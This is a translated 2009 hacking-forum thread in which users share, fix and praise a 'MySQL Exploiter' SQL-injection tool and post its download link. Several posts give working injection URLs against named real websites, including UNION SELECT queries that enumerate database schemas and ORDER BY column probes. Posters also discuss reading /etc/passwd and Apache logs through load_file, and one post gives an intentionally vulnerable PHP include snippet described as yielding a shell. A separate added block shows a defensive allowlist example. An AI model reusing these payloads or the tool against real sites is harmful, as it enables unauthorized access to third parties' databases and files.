Fitty, posted July 26, 2009 (edited April 20, 2012 by Fitty):
asdasdasdas
Vlachs, posted July 26, 2009:
And nothing for me?
Fitty (author), posted July 26, 2009:
Sorry
CyberWolf08, posted July 26, 2009 (edited July 26, 2009 by CyberWolf08):
Try adding a pause/stop button too, because it tends to freeze on certain checks and the only thing you can do is close it. For example http://www.romanianwriters.ro/book.php?id=-1
Otherwise it's really cool.
Fitty (author), posted July 26, 2009 (edited July 26, 2009 by Fitty):
The thing is, I hadn't put convert in it...
http://www.romanianwriters.ro/book.php?id=45%20union%20all%20select%201,2,schema_name%20from%20information_schema.schemata%20limit%200,1--
I'm adding it now.
Later edit: I have bagated convert functionen. Link updated
ZoOmLeSs, posted July 26, 2009:
Well done, super cool
Fitty (author), posted July 26, 2009 (edited July 27, 2009 by Fitty):
Thanks daemien. PS: thanks CyberWolf for the suggestion!
Fitty (author), posted July 31, 2009:
Well, I had nothing to do today, so I improved the MySQL Exploiter. I added some things, you'll see.
DOWNLOAD LINK: http://www.sharemobile.ro/download.php?id=373840
Dedicated to blacksie ))
N-W-A, posted July 31, 2009:
Bravo fifty, congratulations.
SirGod, posted July 31, 2009:
LFI exploiter or load_file? Anyway, bravo.
Fitty (author), posted July 31, 2009:
@SirGod: load_file, LFI via SQLi
Thanks @ 007m, SirGod
SirGod, posted July 31, 2009:
load_file != LFI. load_file shows you the contents of the file, LFI includes it, and in any case LFI through SQLi isn't possible, nor through anything else; it's simply LFI.
Fitty (author), posted July 31, 2009:
Well, then I'm the one mixing them up. But still, including the contents of a file in the page is still LFI, bro, whatever you call it.
SirGod, posted July 31, 2009:
It does NOT INCLUDE. It's not the same thing. It only displays. Here's an example so you can tell the difference:

    <?php
    // Both values come straight from the query string, deliberately unvalidated.
    $variabila = $_GET['variabila'];
    $variabila2 = $_GET['variabila2'];
    include "$variabila";                 // runs any PHP found in the target file
    echo file_get_contents($variabila2);  // only prints the file's bytes
    ?>

Does the same thing happen?
If we have: index.php?variabila=../shell.txt
It will include the contents, and you'll have a shell.
If we have: index.php?variabila2=../shell.txt
It will show you the contents of the txt; it won't execute the PHP.
Well, load_file() is similar to file_get_contents(), not to include().
Oust, posted August 1, 2009:
It gives me an error...
Fitty (author), posted August 1, 2009 (edited August 1, 2009 by Fitty):
Yes, I got it, it was about PHP's include() function. Still, is it a rule that this word, inclusion (include), refers strictly to the include() function? I don't think so.
About the "error": I get number of columns 100. wtf??
But how is it supposed to find the number of columns when the site doesn't give an error on order by <large number>??
http://www.liebermangallery.com/art.php?id=925%20order%20by%20119992--
Are you sure the site is vulnerable? If it gives an error when you add the apostrophe but you can't inject commands, it's no use...
SirGod, posted August 1, 2009:
> Yes, I got it, it was about PHP's include() function. Still, is it a rule that this word, inclusion (include), refers strictly to the include() function? I don't think so.
Not strictly to include(). But to:
include()
include_once()
require()
require_once()
The rest only read the contents, they don't include it => so you can't use it. If you include a file that has PHP code in it, it will "execute" the PHP code, but if you READ it (file_get_contents, etc.) it WILL NOT EXECUTE IT, it will only show the contents of the file.
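The include-versus-read distinction from the posts above, seen from the defensive side. This is an added example, not code from anyone in the thread; the page names, directory layout and function names are assumptions.

```php
<?php
// Added example, not code from the thread. Page names, directory layout and
// function names are hypothetical.

// Allowlist: the request parameter selects a key, never a path.
const PAGES = ['home' => 'home.php', 'contact' => 'contact.php'];

// Map a user-supplied page name to a file that may be passed to include.
// Anything that is not an allowlisted key (such as "../shell.txt") yields null.
function resolve_include(string $name, string $baseDir): ?string
{
    if (!array_key_exists($name, PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$name];
}

// Read a file for display only. The bytes are returned HTML-escaped and never
// reach an include-family call, so PHP source in the file is shown as text.
// realpath() keeps the read inside $baseDir even if $name contains "../".
function read_for_display(string $name, string $baseDir): ?string
{
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : htmlspecialchars($data, ENT_QUOTES, 'UTF-8');
}

// Constructed demo data: a text file holding PHP source, plus a file that
// sits outside the served directory.
$dir   = sys_get_temp_dir() . '/inc_demo_' . bin2hex(random_bytes(4));
$pages = $dir . '/pages';
mkdir($pages, 0700, true);
file_put_contents($pages . '/note.txt', '<?php echo "ran"; ?>');
file_put_contents($dir . '/secret.txt', 'outside pages/');

var_dump(resolve_include('../note.txt', $pages));    // input: traversal string
var_dump(resolve_include('home', $pages));           // input: allowlisted key
var_dump(read_for_display('note.txt', $pages));      // input: file inside $pages
var_dump(read_for_display('../secret.txt', $pages)); // input: path leaving $pages
```

Run it with the PHP CLI; the path handed to include is only ever built from an allowlist value, and the display path returns escaped text rather than executing anything.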
Oust, posted August 1, 2009:
So it gives me the error above... on any site, even if it is vulnerable. And stop uploading to share mobile, because it doesn't work, only with a proxy.
Fitty (author), posted August 1, 2009:
@Oust: shut up, man. Did you look through the source before making these stupid claims?
@SirGod: yes, I know there's no way it can execute it (the code). I was referring to including the contents of some file (apache logs, /etc/passwd/, who knows what else..)
SirGod, posted August 1, 2009:
> @Oust: shut up, man. Did you look through the source before making these stupid claims?
> @SirGod: yes, I know there's no way it can execute it (the code). I was referring to including the contents of some file (apache logs, /etc/passwd/, who knows what else..)
Yes, it shows the contents of the apache logs but doesn't execute them, so you can't get remote command execution.
Oust, posted August 1, 2009:
So I'm serious... it doesn't work, does anyone have a better one...
begood, posted August 1, 2009:
Fitty, I like it. Keep developing it.
Oust, posted August 1, 2009 (edited August 1, 2009 by Oust):
Hey fity, gg, the first one works for me... 1.0.1, not 1.1. 1.0.1 IS GOOD!!! Fitty Rulzz
The latest one is good too, but it only works on certain sites, look..
http://www.rocknrollhighschool.nl/index.php?id=63&id_page=17&id_band=29+and+1=2+uNiON+aLl+sElEcT+1,2,3,4,5,6--
Guest vini4p, posted August 1, 2009:
A built-in proxy in the future. Anyway, congratz!
begood, posted August 1, 2009:
> A built-in proxy in the future. Anyway, congratz!
+1. (in case not, use freecap)